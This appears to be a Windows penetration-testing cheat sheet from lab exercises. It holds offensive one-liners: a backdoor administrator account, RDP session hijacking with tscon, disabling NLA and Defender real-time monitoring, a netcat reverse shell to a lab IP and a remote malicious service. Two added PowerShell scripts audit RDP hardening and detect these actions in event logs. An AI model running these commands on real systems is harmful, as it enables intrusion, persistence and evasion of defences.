Check User Privileges, display the privileges of the currently logged-in user:
whoami /priv
Check File Access Permissions, list the access control details for a specified file or directory:
icacls [FILE]
Download a File from an HTTP Server
In Windows PowerShell, wget is an alias of Invoke-WebRequest; use it to download a file from an HTTP server and save it under a local name (-outfile):
wget http://xxxxx/xxx -outfile xx
Transfer Files between Virtual Machines
Pull a file onto a Windows machine from another VM. Start an HTTP server on the VM that holds the file and use wget on the Windows machine to retrieve it:
wget http://10.10.134.86:4444/exploit_me
Note: Ensure the HTTP server is running on the serving VM before executing this command.
Add a Local Windows User and Assign to Administrators
Create a Windows user named "htb" with the password "abc123!" and add it to the administrators group:
net user htb abc123! /add
net localgroup administrators htb /add
Convert VHDX to VDI using VirtualBox
Use VirtualBox's VBoxManage tool (default install path shown) to convert a VHDX file to the VDI format:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi"
File shredding
Deleting files by simply removing them from your hard disk and Recycle Bin is not enough: the files are not permanently deleted and can still be recovered. There are different techniques to remove them permanently from your file system: overwrite the deleted data, or use a shredding tool that destroys the data.
Use the Windows built-in cipher tool to overwrite deleted data. It overwrites only unallocated space, so delete the files first; on SSDs, wear levelling means an overwrite gives no assurance that the original blocks were touched.
For example, cipher /w:E overwrites all deallocated space on drive E:
cipher /w:[DRIVELETTER]
cipher /w:E
Darik's Boot and Nuke ("DBAN") is a self-contained boot image that securely wipes hard disk drives (HDDs). DBAN is appropriate for personal use, bulk data destruction, or emergency data destruction for HDDs, but is not recommended for solid-state drives (SSDs), sanitization that requires auditable compliance documentation, or technical support.
Download link:
# RDP hijacking via CMD
# Example: take over a disconnected session (list sessions and their IDs first, then reconnect one to your own)
query user
tscon 3 /dest:rdp-tcp
PowerShell useful commands
# Find .txt files in the current directory using PowerShell
Get-ChildItem *.txt
# Retrieve information on a specific package via PowerShell
Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table
# Get package info using Get-Package in PowerShell
Get-Package *TOSHIBA*
# Enable Remote Desktop Protocol via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
# Allow Remote Desktop through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Add a user to the Remote Desktop Users group
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username"
# Change a local user's password (e.g. the administrator's) via CMD
net user USERNAME PASSWORD
# Disable Network Level Authentication to allow RDP (WMI, against a remote host)
$TargetServer = "SCADA-SLAVE"
(Get-WmiObject -Class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
# Disable NLA (the UserAuthentication value) to permit RDP - registry command
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
# Enable RDP via command line alongside firewall settings
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Disable real-time monitoring of antivirus through PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
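The RDP and Defender commands above each weaken one host control (RDP enabled, NLA off, firewall group open, extra members in Remote Desktop Users, real-time protection off). The audit below is an added example, not part of the original notes: it reads those same settings back with the built-in NetSecurity, LocalAccounts and Defender modules and reports every deviation from a hardened baseline. The allow-list of approved RDP operators is an assumption to be adapted.

```powershell
# Added example (not from the original notes): report whether the RDP and Defender
# settings changed by the commands above are still in their hardened state.
# Run in an elevated PowerShell on the host being checked (Windows 10 / Server 2016+).

function Get-RdpHardeningState {
    $tsKey  = 'HKLM:\System\CurrentControlSet\Control\Terminal Server'
    $rdpKey = Join-Path $tsKey 'WinStations\RDP-Tcp'

    # fDenyTSConnections: 1 = RDP disabled (the default; expected unless the host is a jump box)
    $denyTs = (Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    # UserAuthentication: 1 = Network Level Authentication required before a session is created
    $nla    = (Get-ItemProperty -Path $rdpKey -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication

    # Firewall: any enabled rule in the "Remote Desktop" group means 3389 is reachable
    $fwOpen = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
                Where-Object Enabled -eq 'True').Count -gt 0

    # Membership of Remote Desktop Users; everything here should be on an allow-list
    $rdpUsers = @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue |
                  Select-Object -ExpandProperty Name)

    # Defender: real-time protection on, and tamper protection on (tamper protection is what
    # stops Set-MpPreference -DisableRealtimeMonitoring $true from taking effect, even for admins)
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ComputerName         = $env:COMPUTERNAME
        RdpDisabled          = ($denyTs -eq 1)
        NlaRequired          = ($nla -eq 1)
        RdpFirewallOpen      = $fwOpen
        RemoteDesktopUsers   = ($rdpUsers -join ';')
        RealTimeProtectionOn = [bool]$mp.RealTimeProtectionEnabled
        TamperProtectionOn   = [bool]$mp.IsTamperProtected
    }
}

# Compare the collected state against the baseline and emit one finding per deviation.
function Test-RdpHardening {
    param(
        [Parameter(Mandatory)] $State,
        [string[]] $AllowedRdpUsers = @()   # assumption: the accounts approved for RDP on this host
    )
    $findings = @()
    if (-not $State.RdpDisabled)          { $findings += 'RDP is enabled (fDenyTSConnections=0)' }
    if (-not $State.NlaRequired)          { $findings += 'NLA not required (UserAuthentication=0): RDP reachable without pre-authentication' }
    if ($State.RdpFirewallOpen)           { $findings += 'Windows Firewall allows the "Remote Desktop" rule group' }
    $unexpected = $State.RemoteDesktopUsers -split ';' | Where-Object { $_ -and ($AllowedRdpUsers -notcontains $_) }
    foreach ($u in $unexpected)           { $findings += "Unexpected member of Remote Desktop Users: $u" }
    if (-not $State.RealTimeProtectionOn) { $findings += 'Defender real-time protection is disabled' }
    if (-not $State.TamperProtectionOn)   { $findings += 'Defender tamper protection is off; Set-MpPreference can switch real-time protection off' }
    $findings
}

$state = Get-RdpHardeningState
$state | Format-List
# The allow-list entry is a placeholder; replace it with your approved RDP operators.
Test-RdpHardening -State $state -AllowedRdpUsers @("$env:COMPUTERNAME\rdp-operator")
```

An empty result from Test-RdpHardening means the host matches the baseline; each string returned corresponds to one of the commands above having been run (or never reverted), which makes the output easy to turn into a scheduled-task check or a configuration-drift alert.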
# Get help for a PowerShell cmdlet
Get-Help Get-Process
# If you want more detailed information, including examples, use:
Get-Help Get-Process -Detailed
# For the most comprehensive help, including parameter descriptions, use:
Get-Help Get-Process -Full
# And if you're looking for examples specifically, try:
Get-Help Get-Process -Examples
Create malicious service
# Get a reverse shell from Windows using netcat
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443"
# Create and start a malicious service for a reverse shell
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto"
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"
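Each of the three activities in these notes leaves a distinct event-log trace: the net user / net localgroup commands produce Security events 4720 (account created) and 4732 (member added to a local group), the tscon session takeover produces a 4688 process-creation event for tscon.exe (when process-creation auditing is enabled), and sc.exe create produces System event 7045 from the Service Control Manager. The script below is an added example, not part of the original notes: it applies detection rules for all three to event XML in the shape Get-WinEvent's ToXml() returns. The sample events are constructed so the rules run offline; the watched-group list and the "outside System32 / Program Files" service heuristic are assumptions to tune.

```powershell
# Added example (not from the original notes): triage Security/System events for the
# account, RDP-session and service activity described in these notes.

function Get-EventField {
    # Return the <Data Name="..."> value from an event XML document (namespace-agnostic)
    param([xml]$Event, [string]$Name)
    $node = $Event.SelectSingleNode("//*[local-name()='Data'][@Name='$Name']")
    if ($node) { $node.InnerText } else { $null }
}

function New-Alert {
    param([string]$Computer, [string]$Severity, [string]$Rule, [string]$Detail)
    [pscustomobject]@{ Computer = $Computer; Severity = $Severity; Rule = $Rule; Detail = $Detail }
}

function Find-SuspiciousEvents {
    param(
        [xml[]]$Events,
        # Groups whose membership changes warrant an alert (assumption: tune per environment)
        [string[]]$WatchedGroups = @('Administrators', 'Remote Desktop Users')
    )
    foreach ($e in $Events) {
        $id       = [int]$e.SelectSingleNode("//*[local-name()='EventID']").InnerText
        $computer = $e.SelectSingleNode("//*[local-name()='Computer']").InnerText
        $actor    = Get-EventField $e 'SubjectUserName'
        switch ($id) {
            4720 {   # Security: a user account was created
                New-Alert $computer 'Medium' 'LocalAccountCreated' "$(Get-EventField $e 'TargetUserName') created by $actor"
            }
            4732 {   # Security: a member was added to a security-enabled local group
                $group = Get-EventField $e 'TargetUserName'
                if ($WatchedGroups -contains $group) {
                    New-Alert $computer 'High' 'PrivilegedGroupAdd' "$(Get-EventField $e 'MemberSid') added to $group by $actor"
                }
            }
            4688 {   # Security: process creation; tscon.exe is rarely run by anyone but admins
                if ((Get-EventField $e 'NewProcessName') -match '(?i)\\tscon\.exe$') {
                    New-Alert $computer 'High' 'RdpSessionHijack' "tscon run by ${actor}: $(Get-EventField $e 'CommandLine')"
                }
            }
            7045 {   # System: a service was installed (logged by the Service Control Manager)
                $img = Get-EventField $e 'ImagePath'
                # Heuristic: binaries outside System32 / Program Files are the ones to look at first
                $sev = if ($img -match '(?i)^"?((%SystemRoot%|C:\\Windows)\\System32\\|C:\\Program Files)') { 'Low' } else { 'High' }
                New-Alert $computer $sev 'ServiceInstalled' "$(Get-EventField $e 'ServiceName') -> $img (runs as $(Get-EventField $e 'AccountName'))"
            }
        }
    }
}

function New-SampleEvent {
    # Build an event document in the shape Get-WinEvent's ToXml() returns (constructed test data)
    param([int]$Id, [string]$Provider, [System.Collections.IDictionary]$Data, [string]$Computer = 'WS01.corp.example')
    $fields = ''
    foreach ($kv in $Data.GetEnumerator()) {
        $fields += "<Data Name='$($kv.Key)'>$([System.Security.SecurityElement]::Escape([string]$kv.Value))</Data>"
    }
    [xml]"<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='$Provider'/><EventID>$Id</EventID><Computer>$Computer</Computer></System><EventData>$fields</EventData></Event>"
}

# Constructed samples mirroring what the commands in these notes would log
$samples = @(
    New-SampleEvent -Id 4720 -Provider 'Microsoft-Windows-Security-Auditing' -Data ([ordered]@{
        TargetUserName = 'htb'; SubjectUserName = 'operator' })
    New-SampleEvent -Id 4732 -Provider 'Microsoft-Windows-Security-Auditing' -Data ([ordered]@{
        MemberName = '-'; MemberSid = 'S-1-5-21-1111111111-2222222222-3333333333-1005'; TargetUserName = 'Administrators'; SubjectUserName = 'operator' })
    New-SampleEvent -Id 4688 -Provider 'Microsoft-Windows-Security-Auditing' -Data ([ordered]@{
        SubjectUserName = 'SYSTEM'; NewProcessName = 'C:\Windows\System32\tscon.exe'; CommandLine = 'tscon 3 /dest:rdp-tcp' })
    New-SampleEvent -Id 7045 -Provider 'Service Control Manager' -Data ([ordered]@{
        ServiceName = 'UpdaterSvc'; ImagePath = 'C:\Users\Public\bad.exe'; StartType = 'auto start'; AccountName = 'LocalSystem' })
    New-SampleEvent -Id 7045 -Provider 'Service Control Manager' -Data ([ordered]@{
        ServiceName = 'Spooler'; ImagePath = 'C:\Windows\System32\spoolsv.exe'; StartType = 'auto start'; AccountName = 'LocalSystem' })
)
Find-SuspiciousEvents -Events $samples | Format-Table -AutoSize

# Live use (elevated): pull the last day of relevant events and run the same rules
# $live  = @(Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720,4732,4688; StartTime=(Get-Date).AddDays(-1)} -ErrorAction SilentlyContinue)
# $live += @(Get-WinEvent -FilterHashtable @{LogName='System';   Id=7045;           StartTime=(Get-Date).AddDays(-1)} -ErrorAction SilentlyContinue)
# Find-SuspiciousEvents -Events ($live | ForEach-Object { [xml]$_.ToXml() })
```

On the constructed input the rules return five alerts: the account creation, the Administrators addition, the tscon execution, a High-severity service pointing at C:\Users\Public and a Low-severity one for the Spooler path. 4688 only carries a CommandLine when "Include command line in process creation events" is enabled, and a tscon takeover of another user's session requires SYSTEM, so the SubjectUserName of that event is itself a useful indicator.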